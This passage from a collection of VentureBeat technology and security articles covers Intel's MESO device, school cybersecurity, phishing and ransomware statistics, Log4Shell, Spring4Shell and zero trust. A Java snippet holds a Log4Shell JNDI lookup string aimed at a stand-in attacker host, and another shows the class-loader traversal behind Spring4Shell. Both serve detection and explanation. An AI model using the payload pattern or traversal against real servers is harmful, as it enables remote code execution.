Either MESO could represent an alternative manufacturing technology used alongside conventional CMOS circuits, or it could be targeted to succeed CMOS altogether, much as the FinFET completely replaced the conventional planar transistor at the leading edge. Notably, a key reason for MESO to usurp CMOS would be its substantial gain in power efficiency, according to Intel. Because MESO’s driving current is clocked and power-gated by MOSFETs, the device does not need a static DC current to operate. Therefore, combined with its lower supply voltage, MESO would dissipate less power than CMOS, Intel claims.

In the former case, Intel could for example make chiplets using MESO transistors that would be attached to regular CMOS chiplets. This would be similar to how Intel also has distinct fabs for silicon photonics (which uses older process technology) and its 3D XPoint memory. In the latter case, Intel already laid out its multi-year roadmap earlier this year, making it unlikely MESO will be commercialized this decade. According to this roadmap, Intel would introduce the 18A node in 2025, which would be the first to use the next-gen (over $300 million) high-NA EUV lithography tool from ASML. It would be the successor to 20A, where Intel plans to introduce the RibbonFET and PowerVia. RibbonFET represents the biggest change to the transistor since the 3D FinFET in 2012, but it would still be more of an evolutionary change. RibbonFET extends the FinFET by wrapping the gate fully around the transistor channel, instead of just three sides as with a fin. In addition, multiple ribbons (which together form one transistor) can be stacked vertically, reducing the area per transistor (and thus advancing Moore’s Law). Secondly, PowerVia represents Intel’s implementation of a backside power delivery network. 
This means the power delivery to the transistor would occur from below the chip, while the regular interconnections between transistors would remain above the transistors. So if the length of time the FinFET has been in use is any indication, Intel would most likely develop the RibbonFET further for several more generations before a new technology might be required to keep up with Moore’s Law. For example, Intel has already demonstrated stacking the PMOS and NMOS RibbonFETs on top of each other. This by itself could nearly double transistor density.

With MESO’s current iteration, however, it appears that Intel intends for MESO and CMOS to “coexist on the same chip.” In this complementary relationship, MESO would improve the efficiency of energy-demanding workloads, whereas CMOS would handle operations that require high speed, such as clocking and analog circuits. As of now, “MESO is an add-on to a CMOS process flow and is not included in the definition of a standard CMOS generation,” Intel said. “It can be added to any CMOS generation and provide a scalable energy efficiency improvement.”

First experimental realization

At IEDM 2021, in collaboration with several academic partners, Intel presented the first experimental realization of the MESO device, which brings it one step closer to commercialization. The demonstration also provides some more insight into the materials used. At the input, the magneto-electric layer consists of bismuth ferrite (BiFeO3), a perovskite oxide. The magnet is a “nanostructured CoFe element,” and the output is a Pt element. The biggest challenge in making the MESO device a reality has been the conversion back to charge. For the circuit to work, the readout has to operate at the same voltage as the write operation. However, as detailed in a 2020 paper, the readout initially worked only at 10nV, though it has since been improved to 100uV. 
In the future, Intel intends to continue improving this readout voltage. At IEDM, the company claimed it had found a tentative path to achieve “100mV input voltage switching (with thinner multiferroic oxide BiFeO3 and its doping) and 100mV output voltage driving of capacitive load (with better quantum materials such as topological materials, 2D electron gases, and functional oxides).” “Further scaling of the MESO device to 10s of nanometers and fabrication of circuits with MESO will then follow,” Intel said.

Other developments

IEDM, as a research-oriented engineering conference, offers a glimpse of the future, and Intel presented several more papers. The most significant one, besides MESO, covered a chip packaging technology called hybrid bonding: Intel has already announced it would use this technology going forward, under the name Foveros Direct. Foveros is the name of Intel’s family of 3D packaging technologies. Intel’s regular Foveros uses copper bumps with pitches of 35-45um. By contrast, hybrid bonding shrinks this down to 10um and below. TSMC, for example, has also developed hybrid bonding (which will be used in upcoming AMD CPUs) and has suggested it could continue to shrink for decades to come. The benefit is a higher density of interconnections.

Moving beyond CMOS

In nanotechnology, there are two approaches to improving electronics. First, most R&D goes into developing the next generations of conventional electronics, which yields the incremental improvements that continue Moore’s Law. Since Moore’s Law is an exponential trend, this approach has been very successful. Alternatively, researchers have been, and still are, investigating a wide array of so-called beyond-CMOS devices with different properties, based on other physical mechanisms. The primary reason to consider these alternative device architectures is to circumvent the “Boltzmann tyranny” that bottlenecks classical electronics, in order to drastically improve the energy efficiency of computing. 
In the last few years, MESO has become a frontrunner in this research. Its appeal lies in its architecture, which uses a traditional electronic input and output but performs the conversion to magnetism, and then back to charge, inside the device itself. Furthermore, as a spintronic device, MESO can be used to build majority gates. This could make it especially suitable for applications in AI, since fewer transistors would be required to build such circuits compared to standard CMOS. Combined with its low operating voltage of potentially just 100mV, MESO could deliver a step-change improvement in energy efficiency. To that end, Intel’s recent demonstration of the first experimental realization of this device shows that it continues to make progress toward turning MESO into a technology that might one day replace, or at least augment, CMOS as the state of the art in process technology.

VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. © 2023 VentureBeat. All rights reserved. "
15,091
2,021
"Cybercriminals go back to school too | VentureBeat"
"https://venturebeat.com/2021/09/01/cybercriminals-go-back-to-school-too"
"Cybercriminals go back to school too

This article was written by Amber Bennoui, senior technical product manager, Threat Stack.

As K-12 and college students prepare to enter another academic year this fall, cybersecurity leaders are issuing stern warnings to educational institutions as cyberattacks pose an increasing risk. The start of the school year represents a ripe opportunity for cybercriminals to exploit faculty, administrators, and students while they settle into their new schedules and routines. Adding to the confusion, K-12 schools and higher educational institutions are still in the early stages of their digital transformations: undertaking efforts to scale infrastructure to support a growing need for remote learning, migrating to cloud infrastructure, and introducing new technologies and frameworks. 
IT leaders at schools and universities must proactively manage their digital transformations by balancing the cybersecurity and compliance needs of their modern IT infrastructure as user adoption grows. Ignore one, and the rest suffer.

Education's transformation into a highly regulated industry

When thinking about highly regulated industries, K-12 and higher education do not initially come to mind. However, given the volume of sensitive information they handle (e.g., student financial records and PII), educational institutions are being forced to comply with frameworks beyond the US Department of Education's Family Educational Rights and Privacy Act (FERPA). Educational institutions' cloud posture introduces new complexities and compliance requirements, including, but not limited to, HIPAA, PCI DSS, SOC, GDPR, and state-mandated privacy requirements. Just as compliance has become the standard for doing business in the private sector, it has also become critical for publicly facing entities like hospitals and schools to keep patient and student personal data secure. Regulators have imposed a wide array of mandates and protections designed to uphold privacy and security standards around consumer information. Educational institutions must have visibility into how data flows into and out of their IT environment. Schools now must identify the local, global, and industry regulations that apply to them and strategically implement the processes and technologies that keep them compliant. Many certifications require a host of documentation, including a clear information security policy, a risk assessment process, security assessments for any third-party tooling, and evidence of information security monitoring and detection. It's also critical that organizations stay current with changes to compliance frameworks. 
Security tooling should map specific behaviors to multiple frameworks and, ideally, identify abnormal or anomalous behavior to proactively flag potential threats, saving a great deal of time and manual labor. Bonus points if you can produce reports that provide proof of compliance when responding to audit requests. The good news is that many of these regulations overlap, so educational institutions can simultaneously satisfy requirements across multiple compliance frameworks. Compliance also has the ancillary benefit of improving security maturity, a critical facet of educational institutions' operations given that Microsoft Security Intelligence found that 61% of nearly 7.7 million enterprise malware encounters reported in the past month came from the education sector.

Cybercriminals taking educational institutions to school

The education sector is heavily under fire from opportunistic cybercriminals. Security vendor PurpleSec found that education ranked last in cybersecurity preparedness out of 17 major industries. That same report also identified close to 500 cybersecurity incidents involving education institutions in 2020 alone. The reason for cybercriminals' heightened interest in the sector is simple: educational IT leaders often do not have the appropriate resources or budget to protect against cyberattacks. They are therefore considered soft targets by bad actors. This scenario is even more critical as schools rush to scale existing tools and implement new remote education tools to enable hybrid learning during the ongoing COVID-19 pandemic. With an IT environment in transition, it is difficult for educational institutions to enforce data ownership security protocols while building redundancies, making them susceptible to DDoS attacks, SQL injection, phishing, ransomware, and password attacks. 
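To illustrate the point about overlapping regulations, a compliance team might maintain a simple mapping from each security control to the frameworks it satisfies. The control names and framework assignments below are illustrative only, not an official compliance crosswalk:

```python
# Hypothetical control-to-framework mapping (illustrative, not an official
# crosswalk). One well-chosen control can satisfy several frameworks at once.
CONTROLS = {
    "encrypt-data-at-rest":   {"HIPAA", "PCI DSS", "GDPR"},
    "access-logging":         {"HIPAA", "PCI DSS", "SOC 2", "FERPA"},
    "annual-risk-assessment": {"HIPAA", "SOC 2"},
    "vendor-security-review": {"SOC 2", "GDPR"},
}

def frameworks_covered(controls: dict[str, set[str]]) -> set[str]:
    """All frameworks touched by at least one implemented control."""
    covered = set()
    for frameworks in controls.values():
        covered |= frameworks
    return covered

def multi_framework_controls(controls: dict[str, set[str]]) -> list[str]:
    """Controls that pull double duty across two or more frameworks."""
    return [name for name, fw in controls.items() if len(fw) >= 2]

print(sorted(frameworks_covered(CONTROLS)))
print(multi_framework_controls(CONTROLS))
```

A mapping like this also makes audit reporting mechanical: filter the controls by framework to produce the evidence list for that audit.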
Recommendations for an A+ cybersecurity strategy

Educational IT leaders must prevent, accurately identify, and quickly respond to risk across cloud infrastructure and applications. Full-stack observability is crucial to preventing and defusing cyberattacks before they become large-scale breaches. Collecting this data is difficult in the cloud, often rendering traditional collection approaches ineffective. This is why many businesses use tooling and scripts backed by machine learning to collect and analyze telemetry based on preset rules and conditions. This option is attractive to academic institutions because it enables IT leaders to fortify and maintain their security posture without adding significant administrative work to their plates. Proactive monitoring allows schools to limit the scope and reach of common attack vectors.

Educational institutions are undergoing a long-awaited technological revolution that will forever change their operations and introduce new efficiencies to the sector. Despite all this change, however, it is essential that IT leaders not lose sight of their compliance and cybersecurity responsibilities. Cybercriminals certainly are not. The first step in any compliance or cybersecurity program is simple: know where and how sensitive information is stored within your infrastructure, monitor configuration across the entire network, log user privileges and access, and determine whether data follows proper handling procedures. These basic tenets serve as a solid foundation for IT leaders to advance their educational institutions' digital transformations.

Amber Bennoui is a senior technical product manager at Threat Stack, a VC fellow at Vencapital, and former co-founder of an experimental open source, peer-to-peer teaching and learning platform, University of Reddit. 
"
15,092
2,021
"Report: Cybercriminals refine tactics to exploit zero-day vulnerabilities | VentureBeat"
"https://venturebeat.com/2021/10/17/report-cybercriminals-refine-tactics-to-exploit-zero-day-vulnerabilities"
"Report: Cybercriminals refine tactics to exploit zero-day vulnerabilities

HP Wolf Security captured exploits of the zero-day CVE-2021-40444 (a remote code execution vulnerability in the MSHTML browser engine that can be triggered simply by opening a malicious Microsoft Office document) as early as September 8, a week before a patch was issued. The latest HP Wolf Security Threat Insights Report shows how cybercriminals continue to innovate in their tactics, techniques, and procedures, and how sophisticated threats like zero-day exploits are rapidly filtering down to less-capable attackers. Looking at the recent CVE-2021-40444 vulnerability, exploit generators emerged on public code-sharing websites days after the vulnerability bulletin was released. 
This exploit is ripe for abuse because attackers can gain control of a system simply by tricking a victim into previewing a malicious Office document in File Explorer. Because so little user interaction is required, victims are less likely to realize their system has been compromised than with other techniques, giving attackers a head start in achieving their objectives, whether that's stealing data or holding a business to ransom. This particular exploit isn't limited to the most advanced cybercriminals, either. Proof-of-concept scripts that allowed almost anyone to weaponize the exploit appeared four days before a patch was available for organizations to install. As many organizations will still be deploying the patch, HP expects to see this vulnerability exploited more over the coming months.

One of the emerging malware trends between July and September is that cybercriminals are increasingly piggybacking off legitimate cloud services like OneDrive to host their malware. This allows them to slip past network security controls that rely on website reputation to protect users, such as web proxies. HP also saw an uptick in JavaScript and HTA (HTML Application) malware delivered as email attachments. These file formats have proven effective at evading detection, allowing attackers to reach employee inboxes. In fact, 12% of email malware isolated by HP Wolf Security in Q3 bypassed at least one email gateway scanner. To protect against zero-day exploits spread via malicious attachments, or stealthy threats that slip past detection tools, organizations need to make sure they are following zero-trust principles, for example by using threat isolation as part of a layered defense. 
This will protect the organization from the most common attack vectors like clicking on malicious links, attachments, and downloads, or visiting malicious web pages. Risky tasks are executed in disposable, isolated virtual machines, separated from the host operating system. If a user opens a malicious document, the malware is trapped — its operator has nowhere to go and nothing to steal. This renders malware harmless and helps keep organizations safe. Read the full report by HP. "
15,093
2,022
"22 very bad stats on the growth of phishing, ransomware | VentureBeat"
"https://venturebeat.com/security/22-very-bad-stats-on-the-growth-of-phishing-ransomware"
"22 very bad stats on the growth of phishing, ransomware

Email-based phishing attacks became a lot more successful in 2021, and so did ransomware attacks, in terms of getting victims to pay the ransom demand, according to new stats from email security vendor Proofpoint. The vendor's new report, the 2022 State of the Phish, provides insights into what's been happening with phishing, the sneaky email-borne attacks that often serve as the starting point for a ransomware incident. The report has new details to add on ransomware, too. During 2021, "cybercriminals continued to target people, rather than infrastructure, with social engineering efforts," said Adenike Cosgrove, cybersecurity strategist at Proofpoint, in an email to VentureBeat. And notably, "cybercriminals were not only more active in 2021 compared to 2020, they were also more successful," Cosgrove said. 
Worsening trends

The report comes after a number of major cybersecurity firms have released data on just how bad things got last year when it came to cyberattacks. For instance, SonicWall reported that the total number of ransomware attacks more than doubled in 2021, jumping 105% during the year compared to 2020. CrowdStrike, meanwhile, disclosed that data leaks related to ransomware surged 82% in 2021, while the average ransom demand grew 36% to $6.1 million. Today, it's Proofpoint's turn. The company's findings are based on a survey of 600 security professionals and 3,500 workers in Australia, France, Germany, Japan, Spain, the United Kingdom and the U.S., as well as data from simulated phishing attacks sent by Proofpoint and from customer reporting. Below are 22 statistics from the report that stand out to me as the most significant for businesses. The results of the survey on phishing and ransomware come as "employees are feeling burned out, emotionally drained and distracted," Proofpoint says in the report. "Meanwhile, cyber attackers are as adept as ever. And they continue to use tactics and lures that resonate with employees and consumers alike." What follows are 22 troubling stats on the growth of phishing and ransomware, via Proofpoint's 2022 State of the Phish report.

Phishing

1. Email-based phishing: 83% of organizations said they experienced a successful email-based phishing attack in 2021, versus 57% in 2020. That equates to a 46% increase in organizations hit with a successful phishing attack last year.

2. Bulk phishing: 86% of organizations faced bulk phishing attacks last year, up from 77% the year before. Bulk phishing is "indiscriminate, 'commodity' attacks in which the same email is sent to many people within an organization," Proofpoint says.

3. 
BEC attacks: 77% of organizations faced business email compromise (BEC) attacks in 2021, up from 65% in 2020. That represents an 18% increase in BEC attacks.

4. Spearphishing attacks: 79% of organizations saw spearphishing attacks (i.e., attacks targeting specific users) in 2021. That's up from 66% the year before.

"Whether it's ransomware, business email compromise, or a variety of other threat types, email remains the No. 1 channel for cybercriminals to steal data and siphon billions each year," Cosgrove said. "Over 90% of targeted attacks start with email, and nearly all rely on human interaction to work — making people the new enterprise perimeter to defend." The focus on securing digital systems over the past several years means that attackers "have moved to combining social engineering lures via email with a variety of attack methods delivered via attachment or URL," she said. "Many corporate users require email to do their job — and all it takes is one human to click a link in an office document that contains a malicious macro, and a downloader or other malware can be implanted on the target system."

Smishing/vishing/social

5. Smishing: 74% of organizations faced smishing attacks in 2021, versus 61% in 2020. Smishing refers to attacks that primarily use SMS text messages as the communication method.

6. Vishing: 69% of organizations faced vishing attacks, which use phone calls or voice messages, in 2021. That's up from 54% in 2020.

7. Social attacks: 74% of organizations experienced attacks via social media in 2021, compared to 61% in 2020.

These findings show that "while email remains a vector of choice for cybercriminals, they continue to use a multitude of methods to target employees," Cosgrove said. In particular, attackers capitalized on global news cycles and trends "to gain traction with those they were targeting," she said. 
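Note that the "increase" figures quoted in these stats are relative (year-over-year) changes rather than percentage-point differences, which is easy to verify:

```python
def relative_increase(prev: float, curr: float) -> int:
    """Year-over-year relative change, rounded to a whole percent."""
    return round((curr - prev) / prev * 100)

# 83% of orgs hit in 2021 vs 57% in 2020 -> the quoted "46% increase"
print(relative_increase(57, 83))  # 46
# BEC: 77% in 2021 vs 65% in 2020 -> the quoted "18% increase"
print(relative_increase(65, 77))  # 18
```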
As examples, Proofpoint researchers saw attackers using lures relating to new strains of COVID-19, the Netflix show “Squid Game,” popular social media profiles and movie streaming services. “Attackers are continually pivoting to using topics that will get the most clicks,” Cosgrove said. Successful phishing attacks Here are some of the consequences that organizations experienced in connection with successful phishing attacks (stats number 8-18 for this list):
- 54% experienced a breach of customer or client data
- 48% saw credential/account compromise
- 46% experienced ransomware infection
- 44% saw loss of data/intellectual property
- 27% were hit with malware other than ransomware
- 24% reported reputational damage
- 22% reported a widespread network outage/downtime
- 18% reported that an advanced persistent threat resulted
- 17% reported financial loss/wire transfer or invoice fraud
- 15% saw a zero day exploit
- 11% paid a financial penalty/regulatory fine
Ransomware 19. Email-based ransomware : 78% of organizations experienced email-based ransomware attacks in 2021. (Proofpoint didn’t disclose a comparable statistic for 2020.) 20. Ransomware infections : 68% of organizations were infected by ransomware in 2021, up from 66% in 2020. Nearly two-thirds of those organizations were hit by three separate ransomware infections, while nearly 15% of those experienced more than 10 separate ransomware infections. 21. Ransom payments : 58% of organizations infected with ransomware agreed to pay a ransom in 2021 — well above the 34% that did so in 2020. Of those, 32% had to make an additional ransom payment to regain access to their data/systems. And 4% of those who paid never were able to get access to their data and systems. Awareness 22. When asked, “what is phishing?” — 53% of workers answered correctly in 2021, down from 63% the year before.
The same question about smishing yielded correct answers 23% of the time (down from 31% in 2020), and vishing was answered correctly 24% of the time in 2021 (down from 30% the year before). U.S. findings In the U.S., Proofpoint data shows that workers are displaying behaviors in their day-to-day lives that could lead to attacks, Cosgrove said. Fifty-five percent of U.S. workers surveyed admitted to taking a risky action in 2021, including 26% that clicked an email link that led to a suspicious website, and 17% that accidentally compromised their credentials, she noted. Additionally, 49% believe that their organization will automatically block all suspicious or dangerous emails — “illustrating a disconnect in the responsibility employees have on the overall security posture of their organization,” Cosgrove said. However, the good news in the U.S. is that many organizations are tailoring their cybersecurity awareness training to keep pace with the threat landscape, according to Cosgrove. Sixty-seven percent of U.S. organizations are using phishing tests that mimic trending threats, compared to the global average of 53%, she said. “While attackers are increasingly active – and successful – in their attacks, organizations are taking steps in shoring up their cyber defenses and keeping their people at the heart of this,” Cosgrove said. Training ‘is working’ All 100% of U.S. organizations surveyed said they run a cybersecurity training program, and 64% say they assign cybersecurity training to all employees in the business, she said. And crucially, “this approach is working, with 84% of U.S. organizations saying security awareness training has reduced phishing failure rates, the highest of any country surveyed,” Cosgrove said. As another indicator, 40% of U.S. organizations reported a ransomware infection as a result of a successful phishing attack, less than the global average of 46%. And, 79% of survey respondents in the U.S. 
said their organization experienced at least one successful email-based phishing attack in 2021, compared to 74% in 2020. “While this is still an increase, it is less significant than what we saw across the global theater,” Cosgrove said. Ultimately, “multilayered protection is the best strategy against phishing emails, with the most important principle being the placement of people at the center of the security strategy,” she said. “It’s critical to understand which users are most targeted — which we refer to as very attacked people — and which of them are the likeliest to fall for the social engineering that phishing attacks rely on,” Cosgrove said. “Users are a critical line of defense against phishing — and it’s important security awareness education provides a foundation to ensure everyone can identify a phishing email and easily report it.” VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,094
2,021
"The Log4j vulnerability is bad. Here's the good news | VentureBeat"
"https://venturebeat.com/2021/12/10/the-log4j-vulnerability-is-bad-heres-the-good-news"
"The Log4j vulnerability is bad. Here’s the good news A critical vulnerability discovered in Log4j, a widely deployed open source Apache logging library, is almost certain to be exploited by hackers — probably very soon. Security teams are working full-throttle to patch their systems, trying to prevent a calamity. (The massive 2017 privacy records breach of Equifax involved a similar vulnerability.) It’s a very bad day, and it could get much worse soon. But in some regards at least, businesses are in a better position to avoid a catastrophe now than in the past. This being 2021, there are some advantages now when it comes to responding to a zero-day bug of this severity, security executives and researchers told VentureBeat.
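The bug, tracked as CVE-2021-44228 and nicknamed "Log4Shell," fires when vulnerable Log4j versions evaluate a "${jndi:...}" lookup embedded in a string they are asked to log. Purely as an illustrative sketch (not a mitigation: real payloads are frequently obfuscated, and patching is the only real fix; the class and method names here are hypothetical), a naive check for the telltale pattern in untrusted input might look like this:

```java
// Illustrative only: flags the plain form of the JNDI lookup string that
// Log4Shell (CVE-2021-44228) abused in logged, attacker-controlled input.
// Obfuscated variants (nested lookups, case tricks, etc.) evade this check,
// so it is no substitute for upgrading Log4j itself.
public class JndiLookupCheck {
    static boolean looksLikeJndiLookup(String s) {
        return s != null && s.toLowerCase().contains("${jndi:");
    }

    public static void main(String[] args) {
        System.out.println(looksLikeJndiLookup("User-Agent: ${jndi:ldap://attacker.example/a}"));
        System.out.println(looksLikeJndiLookup("ordinary log line"));
    }
}
```

The point of the sketch is simply to show what the dangerous input looks like: any field an attacker controls and a vulnerable application logs can carry it.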
First and foremost, “the world is primed for responding to these disclosures, with companies moving to mitigate issues within hours,” said Brian Fox, chief technology officer at Sonatype, in an email. “This particular issue is potentially more dangerous because Log4j is widely adopted. [But] the Apache Log4j team pushed out a fix with urgency. How quickly they moved greatly reduced the chance of severely negative, long-term impacts.” Proactive approach Dave Klein, director of cyber evangelism at Cymulate, said that while the severity of the situation can’t be downplayed — he expects an exploit within 48 hours — the response to the discovery of the vulnerability shows that “we’re getting better at being proactive.” “In the past, you literally had zero days that were two years long,” Klein told VentureBeat. “Today, it really has changed. What we’re seeing is a better situation where the world is finding bug bounties useful, finding vulnerabilities, doing proof of concepts … I’d argue that this is a great example of [security in] 2021.” Crucially, the Apache Log4j team “worked overnight in a nearly unprecedented way to understand and turn around a fix on this quickly,” Fox said. “Oftentimes, zero day reports can take months to come to fruition from report to release. This one appears to have happened within days.” The heightened awareness around cybersecurity has also led to greater buy-in at the corporate leadership level, including in the boardroom, which makes a difference too, Klein said. “For me, cybersecurity is finally at a point where the boardroom gets it. And even if they don’t understand it completely, they’re reaching out to someone in technical leadership and saying, ‘I need to understand this better,’” he said.
“What’s really happening is, the world’s waking up.” Technological factors On top of that, automation technologies for scanning open source code, such as software composition analysis (SCA), have found growing adoption in recent years. So has the use of detection and response capabilities, which could be crucial for uncovering threats in a situation like this. There does appear to be less reliance on the Log4j Java library now than in the past, as well. “There’s more heterogeneity in the Java logging space than there was for a long time,” said Arshan Dabirsiaghi, cofounder and chief scientist at Contrast Security, in an email. “For a long time, the only thing we used was Log4j. It’s not even the default library in some major frameworks anymore.” Regardless, “we’ll be seeing this vulnerability for the rest of our careers in all the nooks and crannies of our IT footprint,” Dabirsiaghi said. “But five years ago, it would have been a lot worse.” ‘Long tail’ vulnerability None of this is to minimize how bad the situation is for security teams and how much worse things could get in the event of an exploit. The remote code execution (RCE) vulnerability in Log4j could enable an attacker to remotely access and control devices. “Since this vulnerability is a component of dozens if not hundreds of software packages, it could be hiding anywhere in an organization’s network, especially enterprises with massive environments and systems,” said Karl Sigler, senior security research manager at Trustwave SpiderLabs, in an email. “The fact that this occurred during December just means a lot of holiday time is going to be missed for security teams that have to respond to threats trying to take advantage of this mass vulnerability,” Sigler said.
“This vulnerability is going to have a really long tail, and will likely ruin weekends and vacations for many IT and information security professionals across the globe.” Given the scale of affected devices and exploitability of the bug, “it is highly likely to attract considerable attention from both cybercriminals and nation-state-associated actors,” said Chris Morgan, senior cyber threat intelligence analyst at Digital Shadows, in an email. Update and be vigilant Security firms say the vulnerability has impacted version 2.0 through version 2.14.1 of Apache Log4j. Organizations are “advised to update to version 2.15.0 and place additional vigilance on logs associated with susceptible applications,” Morgan said. One silver lining is that the configuration mitigations for the vulnerability are “straightforward” and can be easily implemented, said John Bambenek, principal threat hunter at Netenrich, in an email. Services including Apple iCloud and Steam, and apps including Minecraft, have been found to be vulnerable to the RCE flaw, according to LunaSec. Ultimately, according to Amit Yoran, CEO of Tenable, “the good news is that we know about it.” “The fact that it has come to light means we’re in a race to find and fix it before bad actors take full advantage of it,” Yoran said. "
15,095
2,022
"Spring Core vulnerability doesn't seem to be Log4Shell all over again | VentureBeat"
"https://venturebeat.com/2022/03/30/spring-core-vulnerability-doesnt-seem-to-be-log4shell-all-over-again"
"Spring Core vulnerability doesn’t seem to be Log4Shell all over again A newly disclosed remote code execution vulnerability in Spring Core, a widely used Java framework, does not appear to represent a Log4Shell-level threat. Security researchers at several organizations have now analyzed the vulnerability, which was disclosed on Tuesday. Several media reports have claimed the bug could be the “next Log4Shell” — akin to the RCE bug in Apache Log4j that was disclosed in December and impacted countless organizations. However, initial analysis suggests the newly disclosed RCE in Spring Core, dubbed “SpringShell” or “Spring4Shell” in some reports, has significant differences from Log4Shell — and most likely is not as severe.
“Although some may compare SpringShell to Log4Shell, it is not similar at a deeper level,” analysts at cyber firm Flashpoint and its Risk Based Security unit said in a blog post. The analysts reported that they’ve verified that a published proof-of-concept for the vulnerability is “functional,” which they said validates the vulnerability. However, while the vulnerability does currently appear to be legitimate, “its impact may not be as severe as initially rumored,” Flashpoint said in a tweet. Security professional Chris Partridge, who compiled information on the vulnerability on GitHub, wrote that “this does not instinctively seem like it’s going to be a cataclysmic event such as Log4Shell.” “This vulnerability appears to require some probing to get working depending on the target environment,” Partridge said. As a result, researchers suggest that while it’s technically possible for the vulnerability to be exploited, the key question is how many real-world applications are actually impacted by it. (BleepingComputer has reported hearing from multiple sources that the vulnerability is being “actively exploited” by attackers.) The prerequisites:
– Uses Spring Beans
– Uses Spring Parameter Binding
– Spring Parameter Binding must be configured to use a non-basic parameter type, such as POJOs
All this smells of "How can I make an app that's exploitable" vs. "How can I exploit this thing that exists?" “The new vulnerability does seem to allow unauthenticated RCE — but at the same time, has mitigations and is not currently at the level of impact of Log4j,” said Brian Fox, CTO of application security firm Sonatype, in an email to VentureBeat. The Log4Shell vulnerability, on the other hand, was believed to have impacted the majority of organizations, due to the pervasiveness of the Log4j logging software.
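The "non-basic parameter type" prerequisite matters because Spring's data binder walks JavaBeans properties on the bound POJO, and every Java object implicitly exposes a readable "class" property, the first hop in the "class...classLoader" traversal described in public analyses of the bug. A minimal, Spring-free sketch using only JDK bean introspection (the Greeting POJO is hypothetical) shows why a binder must refuse to traverse that property:

```java
import java.beans.BeanInfo;
import java.beans.Introspector;
import java.beans.PropertyDescriptor;

public class BindingTraversalDemo {
    // A typical POJO of the kind Spring parameter binding populates from request params.
    public static class Greeting {
        private String message;
        public String getMessage() { return message; }
        public void setMessage(String m) { message = m; }
    }

    // Reads a JavaBeans property by name, the same introspection a data binder relies on.
    static Object readProperty(Object bean, String name) throws Exception {
        BeanInfo info = Introspector.getBeanInfo(bean.getClass());
        for (PropertyDescriptor pd : info.getPropertyDescriptors()) {
            if (pd.getName().equals(name) && pd.getReadMethod() != null) {
                return pd.getReadMethod().invoke(bean);
            }
        }
        return null;
    }

    public static void main(String[] args) throws Exception {
        Object bean = new Greeting();
        // getClass() makes "class" a readable property on every bean...
        Object cls = readProperty(bean, "class");
        // ...and from the Class object, "classLoader" is one more hop away.
        Object loader = readProperty(cls, "classLoader");
        System.out.println(cls);
        System.out.println(loader != null);
    }
}
```

This is also why the published proof of concept needs the specific binding setup listed in the prerequisites: applications that bind only basic types (strings, numbers) never expose the property graph to traversal in the first place.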
The fact that Log4j is often leveraged indirectly via Java frameworks has also made the issue difficult to fully address for many organizations. No patches yet In terms of the new Spring Core vulnerability, security engineers at Praetorian said that the vulnerability affects Spring Core on JDK (Java Development Kit) 9 and above. The RCE vulnerability stems from a bypass of CVE-2010-1622, the Praetorian engineers said. Spring Framework is a popular framework used in the development of Java web applications. At the time of this writing, patches are not currently available. (The “SpringShell” vulnerability is not the same as the newly disclosed Spring Cloud vulnerability that is tracked at CVE-2022-22963.) The Praetorian engineers said they have developed a working exploit for the RCE vulnerability. “We have disclosed full details of our exploit to the Spring security team, and are holding off on publishing more information until a patch is in place,” they said in a blog post. Update (March 30, 10:45 p.m. PST): Researchers disclosed new evidence pointing to a possible impact from Spring4Shell on real-world applications — though examples of affected applications have not yet been reported. "
15,096
2,021
"7 keys to evaluating zero trust security frameworks | VentureBeat"
"https://venturebeat.com/2021/06/26/7-keys-to-evaluating-zero-trust-security-frameworks"
"7 keys to evaluating zero trust security frameworks Zero trust as a framework for securing modern enterprises has been around for years, but is drawing renewed attention with the increase in cyberattacks. The United States government is pushing for zero trust implementations across all its agencies, and more vendors are jumping on board the already rolling zero trust product bandwagon. The mix of user need and vendor hype makes zero trust frameworks especially difficult to evaluate. Can a given zero trust solution stand up to close scrutiny? Buyers need to define and test an impartial, balanced set of complex criteria before making their purchase decisions. Factors to consider include scalability, advanced patch management, and least-privileged access, and that is just the beginning.
As automated AI-based network and application discovery gains traction, buyers must be prepared to assess the effectiveness of AI software, which is no small task. Zero trust meets mega hype According to a recent ThycoticCentrify survey, 77% of organizations already use a zero trust approach in their cybersecurity strategy. For 42% of respondents, “reducing cyber threats” was the top motivator for adoption, followed by better compliance (30%), reducing privileged access abuse (14%), and inspecting and logging traffic/access requests (also 14%). Interest in zero trust grew more than 230% in 2020 over 2019, according to Gartner. Twenty to thirty new vendors claim to have zero trust-native products or services every quarter, with at least a dozen or more entirely new solutions announced at the RSA Conference. In fact, over 160 vendors are offering zero trust solutions today. But, as organizations ramp up their spending on zero trust, it’s important to separate hype from results. On May 12, President Biden released the Executive Order on Improving the Nation’s Cybersecurity. The Order defines zero trust as the architectural standard for the federal government, calling on the Cybersecurity and Infrastructure Security Agency (CISA) to modernize its current and future cloud computing-based cybersecurity capabilities, programs, and services to support the zero trust architecture. Adopting multi-factor authentication (MFA), employing micro-segmentation, and enforcing least privileged access are table stakes for zero trust architectures. The techniques will see greater adoption in enterprises because they’re mentioned in that Executive Order.
Zero trust is not just about an architecture, and not just about a platform and technology implementation, according to Nayaki Nayyar, chief product officer and president of Ivanti’s Service Management Solutions business. “It’s really a mindset and a culture that every organization needs not only to start but accelerate given some of the recent challenges that everyone has experienced,” she said recently during a presentation on zero trust at Ivanti Solutions Summit 2021. Clearly, an in-depth framework evaluation is an essential part of the mindset users must assume as they build their cybersecurity strategies and architectures. The following seven factors help to isolate those cybersecurity vendors capable of providing a solid zero trust architecture today. Factor 1: Scalability How well a given zero trust solution can scale from protecting small and medium businesses (SMBs) to large-scale enterprises defines how well its architecture is designed to adapt and flex to an organization’s changing needs. Track-tested zero trust solutions can just as quickly protect a remote office, regional center of offices, or an entire organization. However, securing SMBs, which often act as independent partners to larger enterprises, is frequently overlooked. To learn more about how SMBs and midsize enterprises can implement a zero trust architecture, I spoke with Chase Cunningham, chief strategy officer at Ericom Software and a retired Navy cryptologist. Cunningham explained that there are significant gaps in SMB and mid-tier enterprise networked workspaces today — gaps that are difficult to close due to reliance on obsolete perimeter-based technologies. Cunningham says for 